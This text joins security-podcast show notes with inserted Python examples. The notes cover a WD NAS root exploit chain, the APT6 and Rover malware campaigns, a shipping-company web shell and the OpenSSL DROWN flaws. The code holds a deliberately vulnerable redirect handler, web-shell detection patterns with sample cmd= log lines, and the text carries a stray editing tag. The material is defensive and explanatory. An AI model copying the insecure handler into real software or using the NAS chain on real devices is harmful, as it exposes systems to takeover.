  • Decompression is similar: LZ4: 2165 MB/s, zstd: 536 MB/s, zlib: 281 MB/s, xz: 63 MB/s
  • When comparing the command line tools, zstd is about 5x faster at compression, and 3.6x faster at decompression
  • As with gzip and xz, zstd supports different ‘levels’ of compression, but instead of a range from 1 to 9 it offers 1 to 22 (which suggests that additional levels might be added in the future)
  • It looks like it can reach xz levels of compression if turned up high enough
  • “By design, zlib is limited to a 32 KB window, which was a sensible choice in the early ’90s. But, today’s computing environment can access much more memory — even in mobile and embedded environments.

Zstandard has no inherent limit and can address terabytes of memory (although it rarely does). For example, the lower of the 22 levels use 1 MB or less. For compatibility with a broad range of receiving systems, where memory may be limited, it is recommended to limit memory usage to 8 MB. This is a tuning recommendation, though, not a compression format limitation.”
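The three metrics above (ratio, compression speed, decompression speed) are easy to measure yourself. The script below is an added example, not code from the Facebook post: it benchmarks Deflate via `zlib` and xz via `lzma` from the Python standard library, and adds zstd only if the optional third-party `zstandard` package happens to be installed. The input is a constructed, log-like text block, and the level sets per codec are my choice for the demo; absolute numbers will differ from the Silesia figures quoted above and from machine to machine.

```python
"""Measure compression ratio, compression speed and decompression speed.

Added example (not from the Facebook/Zstandard post). Uses zlib (Deflate)
and lzma (xz) from the standard library; picks up the optional `zstandard`
PyPI binding when present, otherwise zstd is skipped.
"""
import lzma
import time
import zlib
from dataclasses import dataclass

try:
    import zstandard  # optional third-party binding for zstd
except ImportError:   # zstd not installed in this environment
    zstandard = None


@dataclass
class Result:
    codec: str
    level: int
    ratio: float            # original_size / compressed_size (> 1.0 is a win)
    compress_mbps: float    # MB/s of input consumed
    decompress_mbps: float  # MB/s of output produced
    roundtrip_ok: bool      # decompress(compress(x)) == x


def make_sample(size=2 * 1024 * 1024):
    """Constructed, deliberately compressible input: repeated log-like lines
    with a changing counter so the data is not trivially all one byte."""
    out = bytearray()
    i = 0
    while len(out) < size:
        out += f"{i:08d} GET /index.html 200 1532 Mozilla/5.0 host=web{i % 7}\n".encode()
        i += 1
    return bytes(out[:size])


def _timed(fn, *args):
    t0 = time.perf_counter()
    res = fn(*args)
    return res, time.perf_counter() - t0


def benchmark(codec, level, compress, decompress, data):
    """Run one codec at one level and report the three metrics."""
    packed, c_sec = _timed(compress, data, level)
    restored, d_sec = _timed(decompress, packed)
    mb = len(data) / 1e6
    return Result(
        codec=codec,
        level=level,
        ratio=len(data) / len(packed),
        compress_mbps=mb / c_sec if c_sec else float("inf"),
        decompress_mbps=mb / d_sec if d_sec else float("inf"),
        roundtrip_ok=(restored == data),
    )


def codecs():
    """codec name -> (compress(data, level), decompress(blob), levels to try)."""
    table = {
        "zlib": (lambda d, l: zlib.compress(d, l), zlib.decompress, (1, 6, 9)),
        "xz": (lambda d, l: lzma.compress(d, preset=l), lzma.decompress, (0, 6)),
    }
    if zstandard is not None:
        table["zstd"] = (
            lambda d, l: zstandard.ZstdCompressor(level=l).compress(d),
            lambda b: zstandard.ZstdDecompressor().decompress(b),
            (1, 3, 19),
        )
    return table


def run_all(data=None):
    """Benchmark every available codec at each of its levels."""
    data = data if data is not None else make_sample()
    results = []
    for name, (comp, decomp, levels) in codecs().items():
        for lvl in levels:
            results.append(benchmark(name, lvl, comp, decomp, data))
    return results


if __name__ == "__main__":
    for r in run_all():
        print(f"{r.codec:>5} L{r.level:<2} ratio={r.ratio:6.2f} "
              f"comp={r.compress_mbps:8.1f} MB/s "
              f"decomp={r.decompress_mbps:8.1f} MB/s ok={r.roundtrip_ok}")
```

Only the ratio and the round-trip are deterministic; the speed columns are wall-clock measurements and should be read relative to each other on the same machine, which is also how the post's own comparison is meant to be read.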


I forgot the password for my consumer grade NAS

  • “I got my WD My Book World Edition II NAS out of the closet. The reason it went in the closet is that I locked myself out of SSH access, and in the meantime I forgot most of its passwords.”
  • “I miraculously still remember the password to my regular user, but the admin password is nowhere to be found and you need the old one to change it. So I start poking around to see if there is any way to recover it.”
  • “One of the most common vulnerabilities on these thingies is allowing anyone to download a “config backup” that includes all the juicy passwords, and indeed, this screen looks promising”
  • The download was just base64 encoded random data. Definitely encrypted
  • “Mandatory Open Source releases usually have LICENSE files or some other indication of what libraries are being used, so he’s hoping to find some clue on what they used.”
  • Apparently WD releases everything, including the php script that generates the config download
  • “Looks like it’s a tarball encrypted with something called encodex and a fixed password”
  • “So we got the config file. Is it over? Nope. No passwords in it. This system does everything wrong. it’s unsalted MD5. Then it is stored a second time as a plain MD5 anyway”
  • I have never seen anyone do that before. I didn’t even know that would work…
  • So they reversed the process and uploaded a new configuration file with the hash of a known password (faster than brute forcing). Why is this allowed by a non-admin user anyway?
  • “Great. Fun. Is it enough? No! I locked myself out of ssh access too, by adding an unmatchable AllowUsers directive to my sshd_config.”
  • “First realization, the whole webgui runs as root. Look at ChangeWebAdmin above, it calls passwd and reads /etc/shadow!”
  • So, when you upload a new config, it just decrypts it and runs the untar, as root
  • “plus the fact that it’s probably a BusyBox implementation of tar might mean that the oldest trick in the book works: creating an archive with a fully-qualified /etc/sshd_config file in it and hope it gets extracted directly at the absolute path.”
  • “No luck. Second try: we see that it’s extracted in /tmp, what if we call it ../etc/sshd_config? No luck with that neither.”
  • “But hey… we can extract as much as we want in /tmp and nothing will get deleted between a run and the next! So let’s try with a convenient symlink :). First we plant a root => / symlink, and now that /tmp/root points to / we try calling our file root/etc/sshd_config and hope it gets extracted inside the symlink”
  • And, we’re in. The sshd_config has been replaced with one uploaded by an unprivileged user.
  • “This is all nice, but I started from a vantage point: I remembered a user login. Can we do something from scratch?”
  • “For example, extracting the config… It didn’t look like that PHP file had any access control, is it possible that… Oh God.”
  • “If we can crack any user password from the MD5, we can go from zero to root”
  • “All actions are actually unauthenticated. If you are not logged in the NAS will answer with a HTTP 302 Redirect… AND THEN PROCEED HANDLING THE REQUEST and sending the output. As if you were logged in. That’s a first for me.”
  • “Let me repeat this: if you are not logged in, the only thing the system will do is add a redirect to the login page in the HTTP Headers and carry on, obeying whatever you are telling it to do.”
  • Most browsers will respect the header and redirect you to the login page, ignoring the excess content included in the response (like a config backup, a file download, or the result of any action whatsoever).
  • “So with the admin password reset trick above, we can get a full escalation from unauth to admin+root. Pwn’d. (The hardest thing was emulating the browser request with curl well enough to upload the file.)”
  • “So yeah, don’t expose these thingies on the Internet and don’t worry too much if you lose the passwords ;-)”
  • And in the end, the mystery was solved: “Turns out all the password fields except the login form have maxlength=16, so when resetting the password I pasted it from the password manager and it got cut without me knowing”
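The NAS story turns on an archive being unpacked as root into a directory that is never cleaned, so a symlink planted by one upload redirects the next one. Below is an added example, written from the defender's side and not the WD firmware code, of how an upload handler should validate a tarball before writing anything: it rejects absolute names and `..` components, resolves each destination with `realpath` so a symlink already on disk cannot steer a member outside the target directory, and rejects link members that point outside it. The archives in `run_demo` are constructed for the demonstration.

```python
"""Safe tar extraction that defeats the planted-symlink trick described above.

Added example (not the NAS vendor's code). Members are written by hand
rather than via TarFile.extract so the check-then-write order is explicit
and the code does not depend on the extraction-filter API of newer Pythons.
"""
import io
import os
import tarfile
import tempfile


class UnsafeArchive(Exception):
    """Raised when a member would land or point outside the extraction dir."""


def _inside(base, path):
    """True if `path`, after resolving any symlinks already on disk, is
    `base` itself or a descendant of it."""
    base = os.path.realpath(base)
    target = os.path.realpath(path)
    return target == base or target.startswith(base + os.sep)


def safe_extract(tar_bytes, dest):
    """Extract only regular files, directories and in-tree symlinks.
    Returns the member names written, in archive order."""
    dest = os.path.realpath(dest)
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf:
            name = m.name
            if os.path.isabs(name) or ".." in name.split("/"):
                raise UnsafeArchive(f"absolute or parent-relative name: {name}")
            out_path = os.path.join(dest, name)
            # realpath follows a symlink planted by an earlier upload (the
            # /tmp/root -> / trick), so this catches root/etc/sshd_config.
            if not _inside(dest, out_path):
                raise UnsafeArchive(f"member escapes extraction dir: {name}")
            if m.isdir():
                os.makedirs(out_path, exist_ok=True)
            elif m.isfile():
                os.makedirs(os.path.dirname(out_path), exist_ok=True)
                with open(out_path, "wb") as f:
                    f.write(tf.extractfile(m).read())
            elif m.issym():
                target = os.path.join(os.path.dirname(out_path), m.linkname)
                if os.path.isabs(m.linkname) or not _inside(dest, target):
                    raise UnsafeArchive(f"link escapes extraction dir: {name} -> {m.linkname}")
                os.makedirs(os.path.dirname(out_path), exist_ok=True)
                os.symlink(m.linkname, out_path)
            else:  # hard links, devices, fifos: nothing a config backup needs
                raise UnsafeArchive(f"unsupported member type: {name}")
            written.append(name)
    return written


def build_tar(members):
    """Constructed in-memory archives for the demo.
    members: (name, 'file'|'dir'|'sym', payload) with payload = file bytes
    for files, the link target for symlinks, ignored for directories."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, kind, payload in members:
            ti = tarfile.TarInfo(name)
            if kind == "file":
                ti.size = len(payload)
                tf.addfile(ti, io.BytesIO(payload))
            elif kind == "dir":
                ti.type = tarfile.DIRTYPE
                tf.addfile(ti)
            elif kind == "sym":
                ti.type = tarfile.SYMTYPE
                ti.linkname = payload
                tf.addfile(ti)
    return buf.getvalue()


def _rejected(tar_bytes, dest):
    try:
        safe_extract(tar_bytes, dest)
        return False
    except UnsafeArchive:
        return True


def run_demo():
    """Replay the three escape attempts from the story plus a benign upload."""
    dest = tempfile.mkdtemp(prefix="nas-upload-")
    out = {
        "parent_traversal_rejected": _rejected(
            build_tar([("../etc/sshd_config", "file", b"x")]), dest),
        "symlink_member_rejected": _rejected(
            build_tar([("root", "sym", "/")]), dest),
    }
    # Simulate the leftover symlink from an earlier, unfiltered upload.
    os.symlink("/", os.path.join(dest, "root"))
    out["planted_symlink_rejected"] = _rejected(
        build_tar([("root/etc/sshd_config", "file", b"x")]), dest)
    out["benign_written"] = safe_extract(
        build_tar([("etc", "dir", None), ("etc/app.conf", "file", b"x=1\n")]), dest)
    with open(os.path.join(dest, "etc", "app.conf"), "rb") as f:
        out["benign_content"] = f.read()
    return out


if __name__ == "__main__":
    print(run_demo())
```

The `realpath` check is evaluated just before each write, so a symlink has to already exist to steer a member; in a shared, never-cleaned scratch directory that window is exactly what the story exploited, which is why the extraction directory should also be fresh per upload and the whole thing should not run as root.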
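The "302 and then carry on" bug is worth seeing in code, because it looks almost right. The following added example (constructed, not the NAS vendor's PHP) puts a vulnerable dispatcher next to a hardened one: the first sets the `Location` header when there is no session and then keeps handling the action, exactly as described above; the second returns immediately and also checks the role before privileged actions such as resetting the admin password. Action names, field names and the demo user table are assumptions for the illustration.

```python
"""Redirect-but-keep-processing bug beside the early-return fix.

Added example (not the NAS firmware). Handlers return (status, headers, body).
"""
CONFIG_BACKUP = b"<constructed config tarball>"
PRIVILEGED = {"set_admin_password"}


def make_users():
    """Constructed demo user table: name -> password."""
    return {"admin": "admin-initial", "alice": "alice-pw"}


def do_action(action, params, users):
    """The business logic both handlers dispatch to."""
    if action == "download_config":
        return 200, CONFIG_BACKUP
    if action == "set_admin_password":
        users["admin"] = params["new"]
        return 200, b"ok"
    return 404, b"no such action"


def handle_vulnerable(action, params, session, users):
    """BUG: adds the redirect header but never returns, so the action still
    runs and its output is appended to the 302 response."""
    status, headers = 200, {}
    if session is None:
        status = 302
        headers["Location"] = "/login.php"
    action_status, body = do_action(action, params, users)
    return (status if status == 302 else action_status), headers, body


def handle_hardened(action, params, session, users):
    """Fail closed: stop at the redirect, and enforce the role per action."""
    if session is None:
        return 302, {"Location": "/login.php"}, b""
    if action in PRIVILEGED and session.get("role") != "admin":
        return 403, {}, b"forbidden"
    status, body = do_action(action, params, users)
    return status, {}, body


if __name__ == "__main__":
    users = make_users()
    print(handle_vulnerable("download_config", {}, None, users))
    print(handle_hardened("download_config", {}, None, users))
```

A browser follows the `Location` header and discards the body, so the vulnerable version looks correct from a GUI but hands everything over to any client that simply ignores the redirect.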

One Key to Rule Them All | TechSNAP 263 https://original.jupiterbroadcasting.net/98991/one-key-to-rule-them-all-techsnap-263/ Thu, 21 Apr 2016 10:41:52 +0000 https://original.jupiterbroadcasting.net/?p=98991

The post One Key to Rule Them All | TechSNAP 263 first appeared on Jupiter Broadcasting.


This week, the FBI says APT6 has pawned the government for the last 5 years, Unaoil: a company that’s bribing the world & Researchers find a flaw in the visa database.

All that plus a packed feedback, roundup & more!

Show Notes:

FBI says APT6 has been pwning the government for the last 5 years

  • The feds warned that “a group of malicious cyber actors,” whom security experts believe to be the government-sponsored hacking group known as APT6, “have compromised and stolen sensitive information from various government and commercial networks” since at least 2011, according to an FBI alert obtained by Motherboard
  • The official advisory is available on the Open Threat Exchange website
  • The alert, which is also available online, shows that foreign government hackers are still successfully hacking and stealing data from US government’s servers, their activities going unnoticed for years. This comes months after the US government revealed that a group of hackers, widely believed to be working for the Chinese government, had for more than a year infiltrated the computer systems of the Office of Personnel Management, or OPM. In the process, they stole highly sensitive data about several millions of government workers and even spies.
  • In the alert, the FBI lists a long series of websites used as command and control servers to launch phishing attacks “in furtherance of computer network exploitation (CNE) activities [read: hacking] in the United States and abroad since at least 2011.” Domains controlled by the hackers were “suspended” as of late December 2015, according to the alert, but it’s unclear if the hackers have been pushed out or they are still inside the hacked networks.
  • “Looks like they were in for years before they were caught, god knows where they are,” Michael Adams, an information security expert who served more than two decades in the US Special Operations Command, and who has reviewed the alert, told Motherboard. “Anybody who’s been in that network all this long, they could be anywhere and everywhere.”
  • “This is one of the earlier APTs, they definitely go back further than 2011 or whatever—more like 2008 I believe,” Kurt Baumgartner, a researcher at the Russian security firm Kaspersky Lab, told me. (Baumgartner declined to say whether the group was Chinese or not, but said its targets align with the interest of a state-sponsored attacker.)
  • Kyrk Storer, a spokesperson with FireEye, confirmed that the domains listed in the alert “were associated with APT6 and one of their malware backdoors,” and that the hackers “targeted the US and UK defense industrial base.” APT6 is “likely a nation-state sponsored group based in China,” according to FireEye, which “has been dormant for the past several years.”
  • Another researcher at a different security company, who spoke on condition of anonymity because he wasn’t authorized to speak publicly about the hacker’s activities, said this was the “current campaign of an older group,” and said there “likely” was an FBI investigation ongoing. (Several other security companies declined to comment for this story.) At this point, it’s unclear whether the FBI’s investigation will lead to any concrete result. But two years after the US government charged five Chinese military members for hacking US companies, it’s clear hackers haven’t given up attacking US targets.

Unaoil: the company that bribed the world

  • After a six-month investigation across two continents, Fairfax Media and The Huffington Post are revealing that billions of dollars of government contracts were awarded as the direct result of bribes paid on behalf of firms including British icon Rolls-Royce, US giant Halliburton, Australia’s Leighton Holdings and Korean heavyweights Samsung and Hyundai.
  • A massive leak of confidential documents, and a large email, has for the first time exposed the true extent of corruption within the oil industry, implicating dozens of leading companies, bureaucrats and politicians in a sophisticated global web of bribery.
  • The investigation centres on a Monaco company called Unaoil.
  • Following a coded ad in a French newspaper, a series of clandestine meetings and midnight phone calls led to our reporters obtaining hundreds of thousands of the Ahsanis’ leaked emails and documents.
  • The leaked files expose as corrupt two Iraqi oil ministers, a fixer linked to Syrian dictator Bashar al-Assad, senior officials from Libya’s Gaddafi regime, Iranian oil figures, powerful officials in the United Arab Emirates and a Kuwaiti operator known as “the big cheese”.
  • Western firms involved in Unaoil’s Middle East operation include some of the world’s wealthiest and most respected companies: Rolls-Royce and Petrofac from Britain; US companies FMC Technologies, Cameron and Weatherford; Italian giants Eni and Saipem; German companies MAN Turbo (now known as MAN Diesel & Turbo) and Siemens; Dutch firm SBM Offshore; and Indian giant Larsen & Toubro. They also show the offshore arm of Australian company Leighton Holdings was involved in serious, calculated corruption.
  • The leaked files reveal that some people in these firms believed they were hiring a genuine lobbyist, and others who knew or suspected they were funding bribery simply turned a blind eye.
  • The files expose the betrayal of ordinary people in the Middle East. After Saddam Hussein was toppled, the US declared Iraq’s oil would be managed to benefit the Iraqi people. Today, in part one of the ‘Global Bribe Factory’ expose, that claim is demolished.
  • It is the Monaco company that almost perfected the art of corruption.
  • It is called Unaoil and it is run by members of the Ahsani family – Monaco millionaires who rub shoulders with princes, sheikhs and Europe’s and America’s elite business crowd.
  • How they make their money is simple. Oil-rich countries often suffer poor governance and high levels of corruption. Unaoil’s business plan is to play on the fears of large Western companies that they cannot win contracts without its help.
  • Its operatives then bribe officials in oil-producing nations to help these clients win government-funded projects. The corrupt officials might rig a tender committee. Or leak inside information. Or ensure a contract is awarded without a competitive tender.
  • On a semi-related note, another big story for you to go read:
  • How to hack an Election from someone who has done it, more than once

Researchers find flaw in Visa database

  • No, not that kind of Visa, the other one.
  • Systems run by the US State Department, that issue Travel Visas that are required for visitors from most countries to be admitted to the US
  • This has very important security considerations, as the application process for getting a visa is when most security checks are done
  • Cyber-defense experts found security gaps in a State Department system that could have allowed hackers to doctor visa applications or pilfer sensitive data from the half-billion records on file, according to several sources familiar with the matter, though defenders of the agency downplayed the threat and said the vulnerabilities would be difficult to exploit.
  • Briefed to high-level officials across government, the discovery that visa-related records were potentially vulnerable to illicit changes sparked concern because foreign nations are relentlessly looking for ways to plant spies inside the United States, and terrorist groups like ISIS have expressed their desire to exploit the U.S. visa system, sources added
  • After commissioning an internal review of its cyber-defenses several months ago, the State Department learned its Consular Consolidated Database, the government’s so-called “backbone” for vetting travelers to and from the United States, was at risk of being compromised, though no breach had been detected, according to sources in the State Department, on Capitol Hill and elsewhere.
  • As one of the world’s largest biometric databases, covering almost anyone who has applied for a U.S. passport or visa in the past two decades, the “CCD” holds such personal information as applicants’ photographs, fingerprints, Social Security or other identification numbers and even children’s schools.
  • “Every visa decision we make is a national security decision,” a top State Department official, Michele Thoren Bond, told a recent House panel.
  • Despite repeated requests for official responses by ABC News, Kirby and others were unwilling to say whether the vulnerabilities have been resolved or offer any further information about where efforts to patch them now stand.
  • State Department documents describe CCD as an “unclassified but sensitive system.” Connected to other federal agencies like the FBI, Department of Homeland Security and Defense Department, the database contains more than 290 million passport-related records, 184 million visa records and 25 million records on U.S. citizens overseas.
  • “Because of the CCD’s importance to national security, ensuring its data integrity, availability, and confidentiality is vital,” the State Department’s inspector general warned in 2011.

Fixing the Barn Door | TechSNAP 257 https://original.jupiterbroadcasting.net/97301/fixing-the-barn-door-techsnap-257/ Thu, 10 Mar 2016 09:39:46 +0000 https://original.jupiterbroadcasting.net/?p=97301

The post Fixing the Barn Door | TechSNAP 257 first appeared on Jupiter Broadcasting.


We’ll tell you about the real world pirates that hacked a shipping company, the open source libraries from Mars Rover found being used in malware & Microsoft’s solution for that after-hack hangover.

Plus great questions, a packed round up & much more!

</gr_replreplace>
<gr_replace lines="612" cat="clarify" orig="• All of this made">
  • All of this made the shipping company suspect a leak, so it hired the RISK Team to track down the source.
Show Notes:

Pirates hacked Shipping Company to find valuable cargo

  • As described in Verizon’s most recent Data Breach Digest, a collection of cyber-security case studies the company’s RISK Team helped investigate and solve sometime in the past year, a reputable global shipping conglomerate started having peculiar problems with sea pirates.
  • The shipping company was telling Verizon that pirates were boarding their vessels at regular intervals.
  • Equipped with a barcode reader (and weapons, of course), searching specific crates, emptying all the high-value cargo, and making off with the loot within minutes of launching their attacks.
  • All of this made the shipping company think there was something strange and hired the RISK Team to track down the source of a possible leak.
  • The RISK Team quickly narrowed down the problem to the firm’s outdated custom-built CMS, which featured an insecure upload script.
  • As the Verizon team explained, a hacker, either part of the sea pirates group or hired by them, had uploaded a Web shell via this insecure form. In turn, this shell was uploaded inside a Web-accessible directory.
  • To make things worse, that particular folder also had “execute” permissions.
  • Using this access to the shipping firm’s database, the hacker pulled down BoLs (bills of lading), future shipment schedules, and ship routes so the pirates could plan their attack and identify crates holding valuable content.
  • Fortunately, the hacker wasn’t that skilled. Verizon says that the attacker used a Web shell that didn’t support SSL, meaning that all executed commands were recorded in the Web server’s log.
  • The RISK Team was able to recreate a historic timeline of all the hacker’s actions and identify exactly what he looked at and where he sent the files.
  • Verizon’s RISK Team states:

“These threat actors, while given points for creativity, were clearly not highly skilled,” the RISK Team explains. “For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers.”
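The forensic break in this case came from the web server's access log, because the web shell took its commands in plaintext request URLs. As an added example, not Verizon's tooling, the script below runs two simple detections over a few constructed Apache combined-format lines: a server-side script living under an upload directory (the misconfigured folder with execute permission), and query parameters that carry a command. It assumes the shell is driven through the GET query string, which is what a default access log records; commands sent in POST bodies would need request-body logging or a WAF log instead.

```python
"""Spot web-shell activity in access-log lines.

Added example, not Verizon RISK Team code. Log lines are constructed;
the upload directories, script extensions and parameter names are
assumptions that a real deployment would tune to its own CMS.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_DIRS = ("/uploads/", "/images/", "/files/")   # should never serve code
EXEC_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi")
CMD_PARAMS = {"cmd", "exec", "command", "c", "run"}   # common shell knobs

# Constructed sample: two ordinary clients plus one that uploads a script
# through the CMS and then drives it with ?cmd= from the upload directory.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2016:09:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '10.0.0.5 - - [10/Mar/2016:09:12:02 +0000] "GET /images/logo.png HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Mar/2016:09:15:10 +0000] "POST /cms/upload.php HTTP/1.1" 200 311',
    '198.51.100.7 - - [10/Mar/2016:09:15:15 +0000] "GET /uploads/docs/report.php?cmd=ls HTTP/1.1" 200 911',
    '198.51.100.7 - - [10/Mar/2016:09:15:40 +0000] "GET /uploads/docs/report.php?cmd=lss HTTP/1.1" 200 77',
    '198.51.100.7 - - [10/Mar/2016:09:16:02 +0000] "GET /uploads/docs/report.php?cmd=cat+bol.csv HTTP/1.1" 200 40221',
    '10.0.0.9 - - [10/Mar/2016:09:17:00 +0000] "GET /uploads/docs/manifest.pdf HTTP/1.1" 200 88012',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if unparseable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_webshell(lines):
    """Group suspicious requests by (client, path) and explain why each was
    flagged. Sorted so the busiest suspect comes first."""
    suspects = {}
    for rec in filter(None, map(parse_line, lines)):
        parts = urlsplit(rec["url"])
        path = parts.path
        reasons = []
        if path.lower().startswith(UPLOAD_DIRS) and path.lower().endswith(EXEC_EXT):
            reasons.append("script-in-upload-dir")
        if CMD_PARAMS & set(parse_qs(parts.query)):
            reasons.append("command-parameter")
        if not reasons:
            continue
        entry = suspects.setdefault((rec["ip"], path), {
            "ip": rec["ip"], "path": path, "first_seen": rec["ts"],
            "hits": 0, "reasons": set(),
        })
        entry["hits"] += 1
        entry["reasons"].update(reasons)
    return sorted(suspects.values(), key=lambda e: (-e["hits"], e["ip"]))


if __name__ == "__main__":
    for alert in detect_webshell(SAMPLE_LOG):
        print(f"{alert['ip']} {alert['path']} hits={alert['hits']} "
              f"first={alert['first_seen']} reasons={sorted(alert['reasons'])}")
```

Pivoting from the flagged path back to the earlier `POST /cms/upload.php` from the same client gives the upload moment, which is the start of the timeline the RISK Team reconstructed; the mistyped `cmd=lss` is the kind of fumbling the investigators mention.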


Open source libraries from Mars Rover found being used in malware

  • According to Palo Alto Networks, on December 24, 2015, India’s Ambassador to Afghanistan received a spear-phishing email that contained a new malware variant, which, if downloaded and installed, would have opened a backdoor on the official’s computer.
  • India has been a trustworthy business partner for Afghanistan, helping the latter build its new Parliament complex, the Salma Dam, along with smaller transportation, energy, and infrastructure projects.
  • Because of this tight collaboration between the two, it is normal that other nations or interest groups may want to know what the two countries are planning together.
  • The Ambassador’s email was spoofed and made to look like it was coming from India’s Defense Minister, Manohar Parrikar. Attached to the email was an RTF file.
  • Palo Alto researchers say that this file contained malicious code to exploit the CVE-2010-3333 Office XP vulnerability, resulting in the download of a file named “file.exe” from the newsumbrealla[.]net domain.
  • This file was automatically launched into execution and was a simple malware payload dropper that was tasked with downloading the real threat, a new trojan that the researchers christened Rover.
  • This malware was given the “Rover” name because it relied on the OpenCV and OpenAL open source libraries, both used in the software deployed with the famous Mars Rover exploration robot.
  • OpenCV is a library used in computer vision applications and image processing while OpenAL is a cross-platform library for working with multichannel audio data.
  • Its capabilities included the ability to take screenshots of the desktop in BMP format and send them to the C&C server every 60 minutes, logging keystrokes and uploading the data to the C&C server every 10 seconds, and scanning for Office files and uploading them to the C&C server every 60 minutes.
  • Additionally, there was also a backdoor component that allowed attackers to send commands from the C&C server and tell Rover to take screenshots or start recording video (via webcam) and audio (via microphone) whenever the attacker wanted to.
  • “Though ‘Rover’ is an unsophisticated malware lacking modern malware features, it seems to be successful in bypassing traditional security systems and fulfilling the objectives of the threat actor behind the campaign in exfiltrating information from the targeted victim,” Palo Alto researchers explain.
  • Rover is largely undetected by today’s antivirus engines, and despite not coming with that many features, it is successful at keeping a low profile, exactly what cyber-espionage groups need from their malware to begin with.
  • New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan – Palo Alto Networks Blog

Microsoft brings post-breach detection features to Windows

  • Microsoft announced its new post-breach enterprise security service called Windows Defender Advanced Threat Protection, which will respond to these advanced attacks on companies’ networks.
  • The company found that it currently takes an enterprise more than 200 days to detect a security breach, and 80 days to contain it. When there is such a breach, the attackers can steal company data, find private information, and damage the brand and customer trust in the company.
  • For example, a social engineering attack might encourage a victim to run a program that was attached to an e-mail or execute a suspicious-looking PowerShell command. The Advanced Persistent Threat (APT) software that’s typically used in such attacks may scan ports, connect to network shares to look for data to steal, or connect to remote systems to seek new instructions and exfiltrate data. Windows Defender Advanced Threat Protection can monitor this behavior and see how it deviates from normal, expected system behavior. The baseline is the aggregate behavior collected anonymously from more than 1 billion Windows systems. If systems on your network start doing something that the “average Windows machine” doesn’t, WDATP will alert you.
  • The whole thing is cloud-based with no need for any on-premises server. A client on each endpoint is needed, which would presumably be an extended version of the Windows Defender client.
  • Windows Defender Advanced Threat Protection is under development, though it is currently available to some early-adopter customers.
  • This service will help enterprises to detect, investigate and respond to advanced attacks on their networks.
  • Microsoft said that it is building on the existing security defenses Windows 10 offers today, and the new service will provide a post-breach layer of protection to the Windows 10 security stack.
  • With the client technology built into Windows 10 along with the cloud service, it will help detect threats that have made it past other defenses, provide enterprises with information to investigate the breach across endpoints, and offer response recommendations.
  • To avoid Windows 7 becoming “the new Windows XP,” the company is being rather more aggressive in applying pressure on users to upgrade to Windows 10 sooner rather than later.
  • WDATP is going to be part of that same push to Windows 10, and it won’t be available for older operating systems.
  • Windows Defender Advanced Threat Protection uses cloud power to figure out you’ve been pwned | Ars Technica

Feedback:


Round Up:


The post Fixing the Barn Door | TechSNAP 257 first appeared on Jupiter Broadcasting.

]]>
Open Server Sadness Layer | TechSNAP 256 https://original.jupiterbroadcasting.net/97136/open-server-sadness-layer-techsnap-256/ Thu, 03 Mar 2016 17:20:45 +0000 https://original.jupiterbroadcasting.net/?p=97136 OpenSSL issues a major security advisory, we break down the important details, then go in depth on the real world impact of these flaws. Plus some great storage and networking question, a packed round up & much, much more! Thanks to: Get Paid to Write for DigitalOcean Direct Download: HD Video | Mobile Video | […]

The post Open Server Sadness Layer | TechSNAP 256 first appeared on Jupiter Broadcasting.

]]>


OpenSSL issues a major security advisory, we break down the important details, then go in depth on the real world impact of these flaws.

Plus some great storage and networking questions, a packed round up & much, much more!

Thanks to:


DigitalOcean


Ting


iXsystems

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Patreon

Show Notes:

OpenSSL issues major security advisory

  • OpenSSL has released versions 1.0.2g and 1.0.1s to address a number of vulnerabilities:
  • CVE-2016-0800 (DROWN): HIGH: Cross-protocol attack on TLS using SSLv2
  • CVE-2016-0703: HIGH: Divide-and-conquer session key recovery in SSLv2
  • CVE-2016-0702 (CacheBleed): LOW: Side channel attack on modular exponentiation
  • CVE-2016-0704: MODERATE: Bleichenbacher oracle in SSLv2
  • CVE-2016-0705: LOW: Double-free in DSA code
  • CVE-2016-0798: LOW: Memory leak in SRP database lookups
  • CVE-2016-0797: LOW: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption
  • CVE-2016-0799: LOW: Fix memory issues in BIO_*printf functions
  • As per previous announcements, support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date.
  • Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.

As many as one third of all HTTPS sites vulnerable to DROWN

  • “More than 11 million websites and e-mail services protected by the transport layer security protocol are vulnerable to a newly discovered, low-cost attack that decrypts sensitive communications in a matter of hours and in some cases almost immediately”
  • The researchers have dubbed the latest vulnerability DROWN, short for Decrypting RSA with Obsolete and Weakened eNcryption
  • DROWN Attack
  • “The attack works against TLS-protected communications that rely on the RSA cryptosystem when the key is exposed even indirectly through SSLv2, a TLS precursor that was retired almost two decades ago because of crippling weaknesses. The vulnerability allows an attacker to decrypt an intercepted TLS connection by repeatedly using SSLv2 to make connections to a server. In the process, the attacker learns a few bits of information about the encryption key each time. While many security experts believed the removal of SSLv2 support from browser and e-mail clients prevented abuse of the legacy protocol, some misconfigured TLS implementations still tacitly support the legacy protocol when an end-user computer specifically requests its use.”
  • LibreSSL is not affected by DROWN because support for SSLv2 was removed long ago
